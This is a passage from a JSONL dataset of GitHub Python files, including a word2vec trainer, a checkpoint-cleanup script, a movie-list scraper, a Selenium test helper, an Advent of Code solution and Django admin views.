predK[alphabetStr] = estimate_k(model, eval_Dloader, labeled_loaders, args)\n print('GT K:', gtK)\n print('Pred K:', predK)\n print('Average K error: {:.4f}'.format(np.mean(abs(np.array(gtK.values())-np.array(predK.values())))))\n","repo_name":"k-han/DTC","sub_path":"omniglot_est_k.py","file_name":"omniglot_est_k.py","file_ext":"py","file_size_in_byte":7090,"program_lang":"python","lang":"en","doc_type":"code","stars":149,"dataset":"github-code","pt":"34"} +{"seq_id":"22968883168","text":"from collections import namedtuple\nimport config\nimport graph as graph_fns\nimport preprocessing\nimport tensorflow as tf\nimport time\nimport validator\n\nRunInfo = namedtuple(\"RunInfo\", [\n \"session\",\n \"graph\",\n \"saver\",\n \"batcher\",\n \"validator\",\n \"batch_size\",\n \"window_size\",\n \"batches_per_epoch\",\n \"batches_per_logging\",\n \"batches_per_save\",\n \"batches_per_validation\",\n])\n\nBatchInfo = namedtuple(\"BatchInfo\", [\n \"epoch_idx\",\n \"batch_idx\",\n \"inputs\",\n \"labels\",\n])\n\ndef run_batch(run_info, batch_info):\n ri, bi = run_info, batch_info\n\n batch_training_loss, _ = ri.session.run(\n [ri.graph.cost, ri.graph.optimizer],\n feed_dict = {\n ri.graph.inputs: bi.inputs,\n ri.graph.labels: bi.labels\n }\n )\n\n return batch_training_loss\n\ndef log_batches(run_info, batch_info, cumulative_loss, start_time):\n ri, bi = run_info, batch_info\n num_examples = ri.batches_per_logging * ri.batch_size\n end_time = time.time()\n\n average_loss = cumulative_loss / ri.batches_per_logging\n examples_per_sec = int(num_examples / (end_time - start_time))\n print(f\"Epoch: {bi.epoch_idx:03d} | \"\n f\"Batch: {bi.batch_idx:04d} / {ri.batches_per_epoch:04d} | \"\n f\"Avg Train Loss: {average_loss:.2f} | \"\n f\"{examples_per_sec:04d} sec / example\"\n )\n\ndef save(run_info, batch_info):\n ri, bi = run_info, batch_info\n\n run_info.saver.save(\n run_info.session,\n f\"{config.SAVE_BASENAME}-{bi.epoch_idx:03d}-{bi.batch_idx:04d}\"\n )\n print(f\"Epoch: {bi.epoch_idx:03d} | \"\n f\"Batch: {bi.batch_idx:04d} / {ri.batches_per_epoch:04d} | \"\n f\"Model saved!\"\n )\n\ndef run_epoch(run_info, epoch_idx):\n batches = run_info.batcher.batches(\n run_info.batch_size, run_info.window_size\n )\n\n cumulative_loss, start_time = 0, time.time()\n for batch_idx, (inputs, labels) in enumerate(batches, 1):\n batch_info = BatchInfo(\n epoch_idx = epoch_idx,\n batch_idx = batch_idx,\n inputs = inputs,\n labels = labels,\n )\n\n cumulative_loss += run_batch(run_info, batch_info)\n\n should_log = (batch_idx % run_info.batches_per_logging) == 0\n if should_log:\n log_batches(\n run_info, batch_info, cumulative_loss, start_time\n )\n\n should_save = (batch_idx % run_info.batches_per_save) == 0\n if should_save:\n save(run_info, batch_info)\n should_validate = (\n (batch_idx % run_info.batches_per_validation) == 0\n )\n if should_validate:\n run_info.validator.run_and_log(run_info, batch_info)\n\n if should_log:\n # Doing this at the very end to not include the saving or\n # validation time.\n cumulative_loss, start_time = 0, time.time()\n\ndef run(session):\n batcher = preprocessing.Batcher(\n config.SUBSAMPLE_THRESHOLD, config.TEST_MODE\n )\n num_batches = batcher.num_batches(config.BATCH_SIZE)\n graph = graph_fns.build_graph(\n vocab_size = batcher.vocab_size(),\n num_embedding_units = config.NUM_EMBEDDING_UNITS,\n num_negative_samples = config.NUM_NEGATIVE_SAMPLES,\n )\n\n session.run(tf.global_variables_initializer())\n\n run_info = RunInfo(\n session = session,\n graph = graph,\n saver = tf.train.Saver(),\n batcher = batcher,\n validator = validator.Validator(\n batcher.vocab_size(),\n graph.embedding_matrix\n ),\n batch_size = config.BATCH_SIZE,\n window_size = config.WINDOW_SIZE,\n batches_per_epoch = num_batches,\n batches_per_logging = int(\n num_batches * config.LOGGING_FREQUENCY\n ),\n batches_per_save = int(\n num_batches * config.SAVING_FREQUENCY\n ),\n batches_per_validation = int(\n num_batches * config.VALIDATION_FREQUENCY\n ),\n )\n\n for epoch_idx in range(1, config.NUM_EPOCHS + 1):\n run_epoch(run_info, epoch_idx)\n\nwith tf.Session() as session:\n run(session)\n","repo_name":"ruggeri/coursera","sub_path":"foundations-of-deep-learning/06-word2vec/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":4124,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"4588239645","text":"\"\"\"\nDeletes all non-latest checkpoints in all subdirectories recursively to save memory.\nWARNING: only do this if you do not want to resume any of your past model / RL training runs from an intermediate checkpoint!\n\"\"\"\n\nimport os\nimport glob\nimport sys\nimport tqdm\nfrom spirl.components.checkpointer import CheckpointHandler\n\n\ndef find_weight_folders():\n dirnames = []\n for root, dirs, files in os.walk(os.getcwd(), followlinks=True):\n for dir in dirs:\n if dir.endswith(\"weights\"): dirnames.append(os.path.join(root, dir))\n return dirnames\n\n\ndef delete_non_latest_checkpoint(dir):\n latest_checkpoint = CheckpointHandler.get_resume_ckpt_file(\"latest\", dir)\n checkpoint_names = glob.glob(os.path.abspath(dir) + \"/*.pth\")\n for file in checkpoint_names:\n if file != latest_checkpoint:\n os.remove(file)\n\n\ndef query_yes_no(question, default=None):\n \"\"\"Ask a yes/no question via raw_input() and return their answer.\n\n \"question\" is a string that is presented to the user.\n \"default\" is the presumed answer if the user just hits .\n It must be \"yes\" (the default), \"no\" or None (meaning\n an answer is required of the user).\n\n The \"answer\" return value is True for \"yes\" or False for \"no\".\n Copied from here: https://stackoverflow.com/questions/3041986/apt-command-line-interface-like-yes-no-input\n \"\"\"\n valid = {\"yes\": True, \"no\": False}\n if default is None:\n prompt = \" [yes/no] \"\n elif default == \"yes\":\n prompt = \" [YES/no] \"\n elif default == \"no\":\n prompt = \" [yes/NO] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = input().lower()\n if default is not None and choice == \"\":\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no'.\\n\")\n\n\nif __name__ == \"__main__\":\n if not query_yes_no(\"Deleting all non-latest checkpoints from {}, CONTINUE?\".format(os.getcwd())):\n print(\"Aborting...\")\n exit(0)\n\n checkpt_dirs = find_weight_folders()\n\n if not query_yes_no(\"Will delete checkpoints from {} directories, CONTINUE?\".format(len(checkpt_dirs))):\n print(\"Aborting...\")\n exit(0)\n\n for checkpt_dir in tqdm.tqdm(checkpt_dirs):\n delete_non_latest_checkpoint(checkpt_dir)\n\n print(\"Done!\")\n","repo_name":"clvrai/spirl","sub_path":"spirl/utils/scripts/clear_checkpoints.py","file_name":"clear_checkpoints.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","stars":165,"dataset":"github-code","pt":"34"} +{"seq_id":"22419657844","text":"\n\nclass mathProcess():\n\n # does simple math problems\n\n # x = 0\n # y = 0\n\n def __init__(self,x,y):\n # user will enter two numbers to commit math upon\n self.x = x\n self.y = y\n\n def additionfxn(self,x,y):\n print (str(x) + \" plus \" + str(y) + \" results in \" + str(x+y) )\n\n def subtractfxn(self,x,y):\n print (str(x) + \" minus \" + str(y) + \" results in \" + str(x-y) )\n\n def divisionfxn(self,x,y):\n print (str(x) + \" divided by \" + str(y) + \" results in \" + str(x/y) )\n\n def multiplicationfxn(self,x,y):\n print (str(x) + \" multiplied by \" + str(y) + \" results in \" + str(x*y) )\n\n def remainderfxn(self,x,y):\n print (\"The remainder of \" + str(x) + \" divided by \" + str(y) + \" results in \" + str(x%y) )\n\n\n\nprint (\"Let's explore math problems!\")\nusernumX = input(\"What is your first number?\")\nusernumY = input(\"What is your second number?\")\n\nruntheprogram = True\n\nwhile runtheprogram == True:\n\n print(\"\")\n print(\"Let's play with math! Your first number is \" + str(usernumX) + \" and your second number is \" + str(usernumY) + \". What do you want to do with them?\")\n print(\"\")\n print(\"Type 1 to add them together\")\n print(\"Type 2 to subtract the second number from the first\")\n print(\"Type 3 to divide the first by the second\")\n print(\"Type 4 to multiply them both together\")\n print(\"Type 5 to get the remainder after you divide the first by the second\")\n print(\"Type 6 to change your numbers\")\n print(\"Type 7 to end the program\")\n print (\"\")\n userChoice = input(\"What is your choice: \")\n print (\"\")\n\n usetheprogram = mathProcess(usernumX, usernumY)\n\n if userChoice == 1:\n usetheprogram.additionfxn(usernumX, usernumY)\n\n elif userChoice == 2:\n usetheprogram.subtractfxn(usernumX, usernumY)\n\n elif userChoice == 3:\n usetheprogram.divisionfxn(usernumX, usernumY)\n\n elif userChoice == 4:\n usetheprogram.multiplicationfxn(usernumX, usernumY)\n\n elif userChoice == 5:\n usetheprogram.remainderfxn(usernumX, usernumY)\n\n elif userChoice == 6:\n usernumX = input(\"What do you want to change the first number to?\")\n usernumY = input(\"What do you want to change the second number to?\")\n\n elif userChoice == 7:\n print (\"Thanks for playing today! Now ending program.\")\n runtheprogram = False\n\n else:\n print (\"That doesn't do anything!\")\n","repo_name":"mmhilty/babys-first-math-game","sub_path":"babysfirstmathgame.py","file_name":"babysfirstmathgame.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"70852943137","text":"\"\"\"Module containing the LADiM Model class definition\"\"\"\n\nimport ladim\nimport ladim.out_netcdf\nimport ladim.ROMS\nimport ladim.state\nimport ladim.timekeeper\nimport ladim.tracker\nimport numpy as np\n\n# --------------\n# Settings\n# --------------\n\nstart_time = \"1989-05-24 12\"\nstop_time = \"1989-06-20\"\nreference_time = \"1970-01-01\"\n\ndata_file = \"../data/ocean_avg_0014.nc\"\n\nnum_particles = 1000\n\nadvection = \"EF\"\ndt = 3600 # seconds\n\noutput_variables = dict(\n pid=dict(\n encoding=dict(datatype=\"i4\", zlib=True),\n attributes=dict(long_name=\"particle identifier\"),\n ),\n X=dict(\n encoding=dict(datatype=\"f4\", zlib=True),\n attributes=dict(long_name=\"particle X-coordinate\"),\n ),\n Y=dict(\n encoding=dict(datatype=\"f4\", zlib=True),\n attributes=dict(long_name=\"particle Y-coordinate\"),\n ),\n Z=dict(\n encoding=dict(datatype=\"f4\", zlib=True),\n attributes=dict(\n long_name=\"particle depth\",\n standard_name=\"depth below surface\",\n units=\"m\",\n positive=\"down\",\n ),\n ),\n)\n\n# ------------\n# Initiate\n# ------------\n\nstate = ladim.state.State()\n\ngrid = ladim.ROMS.Grid(filename=data_file)\n\ntimer = ladim.timekeeper.TimeKeeper(\n start=start_time, stop=stop_time, dt=dt, reference=reference_time\n)\n\nforce = ladim.ROMS.Forcing(\n filename=data_file, modules=dict(time=timer, grid=grid, state=state)\n)\n\noutput = ladim.out_netcdf.Output(\n filename=\"out.nc\",\n output_period=10800, # 3 hours\n instance_variables=output_variables,\n modules=dict(state=state, time=timer, grid=grid),\n)\n\ntracker = ladim.tracker.Tracker(\n advection=advection, modules=dict(state=state, time=timer, grid=grid, forcing=force)\n)\n\n# --- Initiate particle distribution\nx0, x1 = 63.55, 123.45\ny0, y1 = 90.0, 90\nX0 = np.linspace(x0, x1, num_particles)\nY0 = np.linspace(y0, y1, num_particles)\nZ0 = 5 # Fixed particle depth\nstate.append(X=X0, Y=Y0, Z=Z0)\n\n# ----------------\n# Time stepping\n# ----------------\n\nfor step in range(timer.Nsteps + 1):\n if step > 0:\n timer.update()\n\n # --- Update forcing ---\n force.update()\n\n # --- Output\n output.update()\n\n # --- Update state to next time step\n # Improve: no need to update after last write\n tracker.update()\n\n# -----------\n# Clean up\n# -----------\n\nforce.close()\noutput.close()\n","repo_name":"bjornaa/ladim2","sub_path":"examples/line/line.py","file_name":"line.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"43068267313","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n\"\"\"\n@author: Jock\n\"\"\"\n\nimport requests\nimport re\nimport time\n\n# get_html_text(url)获取网页信息\ndef get_html_text(url):\n try:\n r = requests.get(url) # 爬取完整的网页数据\n r.raise_for_status() # 如果状态不是200,引发HTTPError异常\n return r.text # 以字符串的形式返回爬取的网页内容\n except:\n print(\"访问出错\")\n return \"\" # 发生异常,返回空字符串\n\n# extract_data(data)提取网页内容\ndef extract_data(data):\n # 列表ls_page存储一页的电影信息\n ls_page = []\n # 构建获取排名的正则表达式\n reg_rank = re.compile('(.+?)<', re.S) # re.S'.'匹配换行\n ls_rank = reg_rank.finditer(data)\n # 构建获取影片名称的正则表达式\n reg_movie_name = re.compile('\"(.+?)\"',(.+?)&', re.S)\n ls_movie_year = reg_movie_year.finditer(data)\n for i in range(25):\n # ls_item单独存储一部电影的信息,依次存储排名、电影名、导演名、年份\n ls_item = []\n ls_item.append(next(ls_rank).group(1)) # 添加排名\n ls_item.append(next(ls_movie_name).group(1)) # 添加电影名\n ls_item.append(next(ls_movie_director).group(1).split()[0]) # 添加导演名\n ls_item.append(next(ls_movie_year).group(1).split()[0]) # 添加年份\n ls_page.append(ls_item)\n return ls_page\n\n# process_data(ls_page,fpath)输出、保存提取的信息\ndef process_data(ls_page, fpath):\n try:\n with open(fpath,'a', encoding='utf-8') as f: # 以可读可写的权限打开文件\n for i in ls_page:\n try:\n s = ','.join(i) + '\\n'\n f.write(s) # 写入数据\n except:\n continue\n except:\n # print(\"爬取失败\") # 测试语句\n return \"\"\n\n# 主函数\ndef main():\n fpath = r'C:\\Users\\admin\\Desktop\\豆瓣Top250电影.csv'\n i = 0\n while i < 250:\n url = 'https://movie.douban.com/top250?start=' + str(i)\n data = get_html_text(url)\n print(len(data)) # 测试用\n ls_page = extract_data(data)\n process_data(ls_page, fpath)\n i += 25\n\n# 测试时间\ndef count_spend_time(func):\n start_time = time.time()\n func()\n end_time = time.time()\n time_dif = (end_time - start_time)\n second = time_dif%60\n minute = (time_dif//60)%60\n hour = (time_dif//60)//60\n print('spend ' + str(hour) + 'hours,' + str(minute) + 'minutes,' + str(second) + 'seconds')\n\nif __name__ == '__main__':\n count_spend_time(main)\n\n\n","repo_name":"Jock2018/MyPythonSpiders","sub_path":"爬取豆瓣Top250电影.py","file_name":"爬取豆瓣Top250电影.py","file_ext":"py","file_size_in_byte":2901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"34148426333","text":"class Person:\r\n def __init__(self, name, age):\r\n self.name = name\r\n self.age = age\r\n\r\n\r\nclass Shop:\r\n def __init__(self, x, y):\r\n self.x = x\r\n self.y = y\r\n\r\n\r\ns1 = Shop('3', \"big\")\r\ns2 = Shop('5', 'small')\r\np1 = Person(\"JOHN\", 36)\r\n\r\nprint(p1.name)\r\nprint(p1.age)\r\nprint(s1.y)\r\nprint(s1.x)\r\nprint(s2.x, s2.y)\r\n","repo_name":"Mohamedrafik97/git-jenkins-ex","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12531209731","text":"import os\nfrom subprocess import Popen, PIPE\nimport unittest\nfrom selenium.webdriver import Firefox, FirefoxProfile, Remote, Chrome, ChromeOptions\nfrom selenium.webdriver.firefox.options import Options\nfrom .options import Config\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.common.exceptions import TimeoutException,NoSuchElementException,ElementNotVisibleException,ElementNotInteractableException\nfrom time import sleep\n\nimport logging as log\nfrom pymongo import MongoClient\nfrom collections import ChainMap\n\nMONGO_URI = 'localhost:27017' # TODO: A centralized place for the mongouri, modifiable by config and options.py\nMONGO_DB = 'untapt_krypton'\n\n#TODO: Refactor method extentions to a new KryptonMethods class and use multiple inheritance to Krypton classes\nclass KrDriver(Firefox):\n\n config_options = Config().options\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def wait_for_element(self, id=None, css_selector=None, class_name=None, xpath=None, link_text=None, timeout=20, optional=True ):\n if id:\n by = By.ID\n selector = id\n elif css_selector:\n by = By.CSS_SELECTOR\n selector = css_selector\n elif class_name:\n by = By.CLASS_NAME\n selector = class_name\n elif xpath:\n by = By.XPATH\n selector = xpath\n elif link_text:\n by = By.LINK_TEXT\n selector = link_text\n else:\n raise ValueError(\"wait_for_element must use one kwarg of: id, css_selector, class_name, xpath, link_text\")\n\n try:\n return KrWebElementWrapper(\n WebDriverWait(self, timeout).until(EC.presence_of_element_located((by, selector))))\n except TimeoutException as ex:\n if optional is True:\n log.info(f'wait_for_element: Timeout waiting for \"{selector}\" but doing nothing because \"optional\" is True')\n return KrMissingElement()\n else:\n log.error(f'wait_for_element: Timeout while waiting for element {selector}')\n raise TimeoutException(f'wait_for_element: Timeout while waiting for element {selector}', ex.screen, ex.stacktrace)\n\n\n def get_element(self, id=None, css_selector=None, class_name=None, xpath=None, link_text=None ):\n if id:\n by = By.ID\n selector = id\n elif css_selector:\n by = By.CSS_SELECTOR\n selector = css_selector\n elif class_name:\n by = By.CLASS_NAME\n selector = class_name\n elif xpath:\n by = By.XPATH\n selector = xpath\n elif link_text:\n by = By.LINK_TEXT\n selector = link_text\n else:\n raise ValueError(\"get_element must use one kwarg of: id, css_selector, class_name, xpath, link_text\")\n\n try:\n timeout=self.config_options['timeout']\n WebDriverWait(self, timeout).until(EC.presence_of_element_located((by, selector)))\n elms = self.find_elements(by, selector)\n if not elms:\n raise NoSuchElementException(f'get_element: Element {selector} not found on page {self.url}')\n if elms[0].is_displayed() or elms[0].is_enabled():\n return elms[0]\n else:\n raise ElementNotVisibleException(f'get_element: Element {selector} not displayed or not enabled on page {self.url}')\n\n\n except TimeoutException as ex:\n log.error(f'get_element: Timeout while waiting for element {selector}')\n raise TimeoutException(f'get_element: Timeout while waiting for element {selector} on page {self.url}', ex.screen, ex.stacktrace)\n\n def f_send_keys(self, text, id=None, css_selector=None, class_name=None, xpath=None, link_text=None):\n return self.get_element(id,css_selector,class_name,xpath,link_text).send_keys(text)\n\n def f_click(self, id=None, css_selector=None, class_name=None, xpath=None, link_text=None):\n return self.get_element(id,css_selector,class_name,xpath,link_text).click()\n\n def f_get_text(self, id=None, css_selector=None, class_name=None, xpath=None, link_text=None):\n return self.get_element(id,css_selector,class_name,xpath,link_text).Text\n\n def f_get_attr(self, attribute_name, id=None, css_selector=None, class_name=None, xpath=None, link_text=None):\n return self.get_element(id,css_selector,class_name,xpath,link_text).get_attribute(attribute_name)\n\n @property\n def url(self):\n return self.current_url\n\n def get_path(self, path):\n self.get(self.config_options['url'] + path)\n\n\nclass KrWebElementWrapper:\n\n def __init__(self, webelement):\n self.webelement = webelement\n\n def __getattr__(self, item):\n return getattr(self.unwrap(), item)\n\n def click(self):\n self.unwrap().click()\n return self\n\n def send_keys(self, *value):\n try:\n self.unwrap().send_keys(*value)\n return self\n except TypeError as e:\n raise TypeError(\"Don't know how to send this type to web element\\n\", e)\n\n def wait(self, seconds):\n sleep(seconds)\n return self\n\n def unwrap(self):\n return self.webelement\n\nclass KrMissingElement:\n\n def noop(self, *args, **kwargs):\n return None\n\n def __getattr__(self, item):\n return self.noop\n\n\nclass KrTestCase(unittest.TestCase):\n # config_options = Config().options\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n instance_config = getattr(self.__class__, 'config', {})\n self.config_options = ChainMap(instance_config, Config().options)\n\n\n @classmethod\n def setUpClass(cls):\n print(cls.__module__)\n\n for path, dirs, files in os.walk(f'./scenarios/{cls.__module__}'):\n if path[-8:] == '__data__':\n cls._runNodeWithDbAccess(path, 'preTest.js')\n\n print(path, dirs, files)\n\n @classmethod\n def _runNodeWithDbAccess(cls, path, file):\n pass\n\n def _buildFirefoxDriver(self, headless=False):\n profile = FirefoxProfile()\n profile.accept_untrusted_certs = True\n profile.headless = headless\n profile.set_preference('security.fileuri.strict_origin_policy', False)\n profile.set_preference(\"http.response.timeout\", self.config_options['timeout'])\n profile.set_preference(\"dom.max_script_run_time\", self.config_options['timeout'])\n o = Options()\n o.set_headless(self.config_options['headless'])\n return KrDriver(firefox_profile=profile, options=o)\n\n def _buildChromeDriver(self, headless=False):\n profile = FirefoxProfile()\n profile.accept_untrusted_certs = True\n profile.headless = headless\n profile.set_preference('security.fileuri.strict_origin_policy', False)\n o = Options()\n o.set_headless(self.config_options['headless'])\n return KrDriver(firefox_profile=profile, options=o)\n\n def _cleanupDbWrites(self):\n client = MongoClient(MONGO_URI)\n db = getattr(client, MONGO_DB)\n log.debug('Removing all documents with _kryptonData')\n for collection_name in db.collection_names():\n db[collection_name].remove({'_kryptonData': {'$exists': True}}, multi=True)\n\n def setUp(self):\n if os.path.exists(f'./scenarios/{self.__module__}/__data__/setUp.js'):\n log.debug('setUp.js hook detected')\n js = Popen(['node', f'./scenarios/{self.__module__}/__data__/setUp.js'])\n stdout, stderr = js.communicate()\n log.debug(f'{self.__module__}/__data__/setUp.js:{stdout}')\n\n log.debug(f'config_options for {self}:\\n{self.config_options}')\n\n self.browser = self.config_options['browser']\n self.url = self.config_options['url']\n self.cleanup = self.config_options['cleanup']\n if 'browser' not in self.config_options:\n self.driver = self._buildFirefoxDriver(headless=self.config_options['headless'])\n\n if self.browser == 'Firefox':\n self.driver = self._buildFirefoxDriver(headless=self.config_options['headless'])\n self.driver.set_page_load_timeout(self.config_options['timeout'])\n self.driver.implicitly_wait(self.config_options['timeout'])\n self.driver.set_script_timeout(self.config_options['timeout'])\n if 'url' in self.config_options:\n self.driver.get(self.config_options['url'])\n # print(self.__module__) TODO: this is the name that should be used with errors\n\n def tearDown(self):\n # if self.config_options.get('cleanup_db_writes', 'always') == 'always':\n # self._cleanupDbWrites()\n\n if self.config_options['cleanup'] == 'onfailure':\n # logic for test case\n pass\n elif self.config_options['cleanup'] == 'always':\n self.driver.quit()\n\n\n","repo_name":"untapt/kryptonic","sub_path":"kryptonic/krtest.py","file_name":"krtest.py","file_ext":"py","file_size_in_byte":9083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"42007586731","text":"import os\nimport subprocess\nimport time\nimport webbrowser\n\nfrom config_parser.config import CONFIG\n\ndocs_dir = CONFIG.docs.docs_dir\nport = CONFIG.docs.port\nhost = 'localhost'\n\n\ndef docs_dev():\n shell = os.name == \"nt\"\n p = subprocess.Popen([\"python\", \"-m\", \"http.server\",\n str(port)], shell=shell, cwd=docs_dir)\n webbrowser.open(f'http://{host}:{port}')\n while True:\n try:\n time.sleep(1)\n except KeyboardInterrupt:\n p.terminate()\n break\n","repo_name":"cattidea/shoeprint-recognition","sub_path":"docs/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"25711574800","text":"\"\"\"--- Day 2: Bathroom Security ---\"\"\"\n\ndef solve(keypad, instructions, start_row, start_col):\n\n row = start_row\n col = start_col\n\n code = []\n\n rc = len(keypad) - 1\n\n for instruction in instructions:\n if instruction == \"U\":\n if row > 0 and (keypad[row-1][col] is not None):\n row -= 1\n elif instruction == \"D\":\n if row < rc and (keypad[row+1][col] is not None):\n row += 1\n elif instruction == \"L\":\n if col > 0 and (keypad[row][col-1] is not None):\n col -= 1\n elif instruction == \"R\":\n if col < rc and (keypad[row][col+1] is not None):\n col += 1\n elif instruction == \"\\n\":\n code.append(keypad[row][col])\n\n return \"\".join(map(str, code))\n\nwith open(\"input/02.txt\", \"r\") as f:\n instructions = f.read()\n\n keypad = {}\n\n # part 1\n keypad[0] = [None, None, None, None, None]\n keypad[1] = [None, 1, 2, 3 , None]\n keypad[2] = [None, 4, 5, 6 , None]\n keypad[3] = [None, 7, 8, 9 , None]\n keypad[4] = [None, None, None, None, None]\n\n print(solve(keypad, instructions, 2, 2)) # start on 5\n\n # part 2\n keypad[0] = [None, None, 1, None, None]\n keypad[1] = [None, 2, 3, 4, None]\n keypad[2] = [5, 6, 7, 8, 9 ]\n keypad[3] = [None, \"A\", \"B\", \"C\", None]\n keypad[4] = [None, None, \"D\", None, None]\n\n print(solve(keypad, instructions, 0, 2)) # start on 5\n","repo_name":"mkst/aoc","sub_path":"2016/02.py","file_name":"02.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"34"} +{"seq_id":"31484427","text":"import datetime\nfrom django.contrib.auth.hashers import make_password, check_password\nfrom django.contrib import messages\nfrom django.http import HttpResponseRedirect, JsonResponse, HttpResponse\nfrom django.shortcuts import render\n\nfrom AdminDashboard.models import *\nfrom Home.models import *\nfrom CustomerDashboard.models import *\n\n# Create your views here.\n\n\ndef adminIndex(request):\n datime = datetime.date.today()\n noofusers = Login.objects.filter(roleid=3, isdeleted=False).count()\n noofworkers = Login.objects.filter(roleid=2, isdeleted=False, isapproved=True).count()\n noofbooths = AddToll.objects.filter(isdeleted=False).count()\n noofbooking = Booking.objects.filter(isCanceled=False, isExpired=False).count()\n context = {\n 'datetime': datime,\n 'noofusers': noofusers,\n 'noofworkers': noofworkers,\n 'noofbooths': noofbooths,\n 'noofbooking': noofbooking,\n }\n return render(request, \"AdminDashboard/adminindex.html\", context)\n\n\ndef adminWorkersList(request):\n tolllog = TollRegisterAdditional.objects.filter(workerid__loginid__isdeleted=False, workerid__loginid__roleid=2).order_by('-pk')\n return render(request, \"AdminDashboard/adminworkerslist.html\", {'tolllog': tolllog})\n\n\ndef ApproveWorker(request, id):\n regobj = Registration.objects.get(pk=id)\n field_object = Registration._meta.get_field('loginid')\n field_value = field_object.value_from_object(regobj)\n log = Login.objects.get(pk=field_value)\n log.isapproved = True\n log.status = True\n log.save()\n messages.info(request, \"Approved {}\".format(log.username))\n return HttpResponseRedirect('/admindash/workerslist')\n\n\ndef RejectWorker(request, id):\n regobj = Registration.objects.get(pk=id)\n field_object = Registration._meta.get_field('loginid')\n field_value = field_object.value_from_object(regobj)\n log = Login.objects.get(pk=field_value)\n log.isapproved = False\n log.status = True\n log.save()\n messages.info(request, \"Rejected {}\".format(log.username))\n return HttpResponseRedirect('/admindash/workerslist')\n\n\ndef adminCustomerList(request):\n log = Registration.objects.select_related().filter(loginid__isdeleted=False).filter(loginid__roleid=3)\n vehdetails = VehicleReg.objects.filter(loginid__isdeleted=False, loginid__roleid=3, isdeleted=False)\n return render(request, \"AdminDashboard/admincustomer.html\", {'log':log, 'vehdetails': vehdetails})\n\n\ndef AddDistricts(request):\n if request.method == 'POST':\n districtname = request.POST.get('adddistrict')\n dist = AddDistrict()\n dist.DistrictName = districtname\n dist.isdeleted = False\n if AddDistrict.objects.filter(DistrictName=districtname).filter(isdeleted=False).exists():\n messages.warning(request, \"Already Exist!\")\n return HttpResponseRedirect('/admindash/ListDistrict')\n else:\n dist.save()\n messages.success(request, \"Added Successfully\")\n return HttpResponseRedirect('/admindash/ListDistrict')\n return render(request, \"AdminDashboard/adminDistrictLocations.html\")\n\n\ndef AddLocation(request):\n if request.method == 'POST':\n cityname = request.POST.get('addlocation')\n districtname = request.POST.get('district')\n did = AddDistrict.objects.get(DistrictName=districtname)\n loc = AddLocations()\n loc.CityName = cityname\n loc.DistrictId = did\n loc.isdeleted = False\n if AddLocations.objects.filter(CityName=cityname).filter(isdeleted=False).exists():\n messages.warning(request, \"Already Exist!\")\n return HttpResponseRedirect('/admindash/ListDistrict')\n else:\n loc.save()\n messages.success(request, \"Added Successfully\")\n return HttpResponseRedirect('/admindash/ListDistrict')\n return render(request, \"AdminDashboard/adminDistrictLocations.html\")\n\n\ndef EditDistrict(request, pk):\n dob = AddDistrict.objects.get(pk=pk)\n data = {\n 'Id': dob.pk,\n 'DistrictName': dob.DistrictName\n }\n return JsonResponse(data)\n\n\ndef UpdateDistrict(request):\n if request.POST.get('action') == 'post':\n id = request.POST.get('id')\n name = request.POST.get('DistrictName')\n dobj = AddDistrict.objects.get(pk=id)\n dobj.DistrictName = name\n if AddDistrict.objects.filter(DistrictName=name).filter(isdeleted=False).exists():\n message = {'error': \"Already exists\"}\n messages.warning(request, \"Already Exist!\")\n return JsonResponse(message)\n else:\n dobj.save()\n message = {'message': 'Success'}\n messages.success(request, \"Updated Successfully\")\n return JsonResponse(message)\n\n\ndef DeleteDistrict(request, pk):\n dob = AddDistrict.objects.get(pk=pk)\n dob.isdeleted = True\n if AddLocations.objects.filter(DistrictId=pk, isdeleted=False).exists():\n distdat = AddDistrict.objects.filter(isdeleted=False)\n locdat = AddLocations.objects.select_related().filter(isdeleted=False)\n context = {\n 'nodelete': 'Can\\'t Delete, Because {} is already in location'.format(dob.DistrictName),\n 'distdat':distdat, 'locdata':locdat\n }\n return render(request, \"AdminDashboard/adminDistrictLocations.html\", context)\n else:\n dob.save()\n messages.error(request, \"Deleted Successfully\")\n return HttpResponseRedirect('/admindash/ListDistrict')\n\n\ndef EditLocation(request, pk):\n lob = AddLocations.objects.get(pk=pk)\n data = {\n 'Id': lob.pk,\n 'DistrictId': lob.DistrictId.DistrictName,\n 'CityName': lob.CityName\n }\n return JsonResponse(data)\n\n\ndef UpdateLocation(request):\n if request.POST.get('action') == 'post':\n id = request.POST.get('id')\n dname = request.POST.get('DistrictId')\n lname = request.POST.get('CityName')\n dobj = AddDistrict.objects.get(DistrictName=dname)\n lobj = AddLocations.objects.get(pk=id)\n lobj.CityName = lname\n lobj.DistrictId = dobj\n if AddLocations.objects.filter(CityName=lname).filter(DistrictId=dobj.id).filter(isdeleted=False).exists():\n message = {'error': \"Already exists\"}\n messages.warning(request, \"Already Exist!\")\n return 